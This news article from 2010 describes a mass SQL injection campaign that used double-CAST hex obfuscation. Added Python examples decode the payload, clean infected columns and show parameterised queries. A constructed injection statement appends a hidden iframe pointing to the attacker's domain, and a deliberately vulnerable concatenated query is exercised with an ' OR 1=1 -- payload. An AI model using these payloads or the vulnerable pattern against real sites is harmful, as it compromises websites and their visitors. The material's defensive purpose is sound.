Aug 16, 2010 12:02 GMT  ·  By

Tens of thousands of websites recently compromised in an injection attack, which employs some unusual obfuscation techniques, could start serving a malicious payload at any time.

Security researchers from the SANS Internet Storm Center (ISC) warn of a new mass SQL injection attack, which has compromised a significant number of websites.

The code injected into the database is obfuscated using an unusual technique in which the CAST() function is called twice, each call turning a hexadecimal literal back into a string that the database server then runs.

First a variable @s is declared. Then the variable is set to the result of a CAST on a string of hexadecimal values, and finally the variable is executed as dynamic SQL.

The decoded text contains a second CAST command, which in turn decodes to a hidden <iframe> element that loads a PHP script from the nemohuildiin.ru domain.
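The layered DECLARE/CAST/EXEC construction described above can be unwrapped offline before anything is run. The following is an added example, not code from the ISC diary or from the attack itself: it builds a constructed sample of that shape (the table and column names and the x.php path are placeholders; only the domain comes from the report), then repeatedly decodes every CAST(0x... AS VARCHAR) it finds until no literal is left, and pulls the iframe source out of the final layer. It goes slightly beyond the article by also decoding the NVARCHAR variant, which SQL Server stores as UTF-16LE.

```python
import re

# Constructed sample, not the real injected payload: the outer hex literal
# decodes to T-SQL that carries a second CAST wrapping the iframe. The table,
# column and script path are placeholders; only the domain is from the report.
IFRAME = '<iframe src="http://nemohuildiin.ru/x.php" width=0 height=0></iframe>'
INNER_SQL = ("UPDATE products SET descr=RTRIM(descr)+CAST(0x%s AS VARCHAR(4000))"
             % IFRAME.encode("ascii").hex())
INJECTED = ("DECLARE @S VARCHAR(4000);SET @S=CAST(0x%s AS VARCHAR(4000));EXEC(@S)"
            % INNER_SQL.encode("ascii").hex())

# Matches CAST(0x... AS VARCHAR(n)) and the NVARCHAR/CHAR/NCHAR variants. The
# attackers vary letter case (cAsT, vArChAr), hence IGNORECASE.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*(?:\(\s*(?:\d+|MAX)\s*\))?\s*\)",
    re.IGNORECASE)


def decode_hex(hexstr, typename):
    """Decode one hex literal the way SQL Server's CAST would: NVARCHAR/NCHAR
    is UTF-16LE, VARCHAR/CHAR is a single-byte code page (Latin-1 here)."""
    if len(hexstr) % 2:            # odd digit count: SQL Server pads on the left
        hexstr = "0" + hexstr
    raw = bytes.fromhex(hexstr)
    if typename.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def unwrap_casts(sql, max_depth=10):
    """Replace every CAST(0x.. AS ..) with its decoded text, repeat until no
    literal remains, and return every layer, outermost first."""
    layers = [sql]
    for _ in range(max_depth):
        decoded, count = CAST_RE.subn(
            lambda m: decode_hex(m.group(1), m.group(2)), layers[-1])
        if count == 0:
            break
        layers.append(decoded)
    return layers


IFRAME_SRC_RE = re.compile(
    r"<iframe\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def iframe_sources(text):
    """Every iframe src attribute found in a decoded layer."""
    return IFRAME_SRC_RE.findall(text)


if __name__ == "__main__":
    layers = unwrap_casts(INJECTED)
    for depth, layer in enumerate(layers):
        print(f"layer {depth}: {layer[:90]}")
    print("iframe sources:", iframe_sources(layers[-1]))
```

Running the script on a captured request or on a row of the affected database shows three layers: the injected statement, the UPDATE it hides, and finally the iframe. Because the decoder only rewrites text and never executes it, it is safe to run against anything pulled from web server logs.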

"This attack will try to update every varchar column in your database to append the iframe text shown. This has been a massive and successful attack," Manuel Humberto Santander Peláez, the ISC handler who investigated the compromise, writes.
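Since the attack appends the iframe to every varchar column it can reach, cleanup starts with finding every cell that carries it. The following is an added example, not the ISC handler's script: it uses an in-memory SQLite database with constructed rows as a stand-in for the SQL Server backend, walks the catalogue for every text-typed column, reports the rows containing the marker and strips the appended iframe. The iframe path is a placeholder.

```python
import sqlite3

# Constructed sample iframe; the x.php path is a placeholder, only the domain
# comes from the report.
INJECTED_IFRAME = '<iframe src="http://nemohuildiin.ru/x.php" width=0 height=0></iframe>'


def build_sample_db():
    """Constructed sample data: two tables, two cells carrying the iframe."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name VARCHAR(100),
                              descr VARCHAR(4000), price REAL);
        CREATE TABLE news(id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT);
    """)
    con.executemany("INSERT INTO products(name, descr, price) VALUES (?,?,?)", [
        ("Widget", "A plain widget", 9.99),
        ("Gadget", "A gadget" + INJECTED_IFRAME, 19.99),
    ])
    con.executemany("INSERT INTO news(title, body) VALUES (?,?)", [
        ("Hello" + INJECTED_IFRAME, "Welcome"),
        ("Clean", "Nothing here"),
    ])
    con.commit()
    return con


def text_columns(con):
    """Yield (table, column) for every text-typed column in user tables,
    read from the catalogue just as the attack's cursor did."""
    tables = [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_ in con.execute(f'PRAGMA table_info("{table}")'):
            if any(k in (ctype or "").upper() for k in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def find_injected(con, marker="<iframe"):
    """Return [(table, column, rowid)] for every cell containing the marker.
    Table and column names come from the catalogue, the marker is bound."""
    hits = []
    for table, col in text_columns(con):
        rows = con.execute(f'SELECT rowid FROM "{table}" WHERE "{col}" LIKE ?',
                           (f"%{marker}%",))
        hits.extend((table, col, r[0]) for r in rows)
    return hits


def strip_injected(con, iframe=INJECTED_IFRAME):
    """Remove the appended iframe from every text column; return rows changed."""
    changed = 0
    for table, col in text_columns(con):
        cur = con.execute(
            f'UPDATE "{table}" SET "{col}" = REPLACE("{col}", ?, ?) WHERE "{col}" LIKE ?',
            (iframe, "", f"%{iframe}%"))
        changed += cur.rowcount
    con.commit()
    return changed


if __name__ == "__main__":
    con = build_sample_db()
    print("before:", find_injected(con))
    print("rows cleaned:", strip_injected(con))
    print("after:", find_injected(con))
```

Two caveats a practitioner should keep in mind: a LIKE '%<iframe%' search only catches the exact string the attackers used, so search for the domain and for the hex-encoded form as well, and on SQL Server the legacy text and ntext column types have to be CAST to varchar/nvarchar before REPLACE will accept them. Take a backup before running any bulk UPDATE, and close the injection point first or the columns will simply be rewritten again.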

Searching for the rogue iframe code on Google reveals over 55,000 results, but many could represent different infected pages under the same domain. Bing on the other hand only lists around 27,000 hits.

An interesting aspect is that there is currently no payload being served by the rogue php script on the nemohuildiin.ru domain, which is odd for a new attack.

This indicates that the compromised websites are waiting in standby and could start serving malicious content to their visitors at any time.

It's common for attackers to scan for and build lists of vulnerable sites for later use in mass code injection campaigns. However, it's unusual to exploit them and then wait for the right time to deliver the payload.

In his ISC diary post, Mr. Peláez gives webmasters several pieces of advice to help them keep their websites secure against such attacks.

"Your web application should have predetermined SQL sentences for data access. If the user requests some specific information, the application invokes the specific stored procedure, so there is no possibility of crafting dynamic SQL requests," one of them reads.
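The point of that advice is that user data must reach the database as a bound parameter, never as SQL text. The following is an added example, not the ISC handler's code: it shows a lookup built by string concatenation next to the same lookup with a fixed statement and a bound parameter, plus a type check for the numeric id parameters that the mass injections of this period typically rode on. SQLite stands in for SQL Server and has no stored procedures, so the fixed parameterised statement plays the role of the predetermined SQL sentence; the sample rows are constructed.

```python
import sqlite3


def build_db():
    """Constructed sample catalogue; SQLite stands in for the SQL Server backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, name VARCHAR(100), descr VARCHAR(4000))")
    con.executemany("INSERT INTO products VALUES (?,?,?)",
                    [(1, "Widget", "plain"), (2, "Gadget", "shiny"), (3, "Gizmo", "small")])
    con.commit()
    return con


def search_vulnerable(con, name):
    """Dynamic SQL built by concatenation: whatever the user typed is parsed as SQL."""
    sql = "SELECT id, name FROM products WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def search_safe(con, name):
    """Predetermined statement; the user's text is bound as data and never parsed."""
    return con.execute("SELECT id, name FROM products WHERE name = ?", (name,)).fetchall()


def parse_id(raw):
    """Return the integer id, or None if the parameter is not purely an integer.
    A value such as '1;DECLARE @S VARCHAR(4000)...' is rejected as a whole."""
    try:
        return int(str(raw).strip())
    except ValueError:
        return None


def get_by_id_safe(con, raw):
    """Typed parameter: validate first, then bind the integer to a fixed statement."""
    pid = parse_id(raw)
    if pid is None:
        raise ValueError("id must be an integer")
    return con.execute("SELECT id, name FROM products WHERE id = ?", (pid,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    payload = "' OR 1=1 --"
    print("vulnerable:", search_vulnerable(con, payload))   # every row leaks
    print("safe:      ", search_safe(con, payload))         # no product has that name
    print("by id:     ", get_by_id_safe(con, "2"))
```

Two notes. SQLite's execute() refuses batches, so the DECLARE/CAST/EXEC payload itself cannot be replayed here; SQL Server drivers of the time accepted a second statement after the semicolon, which is exactly why `id=1;DECLARE ...` worked. And a stored procedure only helps if it does not rebuild dynamic SQL internally: a procedure that concatenates its argument into a string and runs it with EXEC is injectable in the same way.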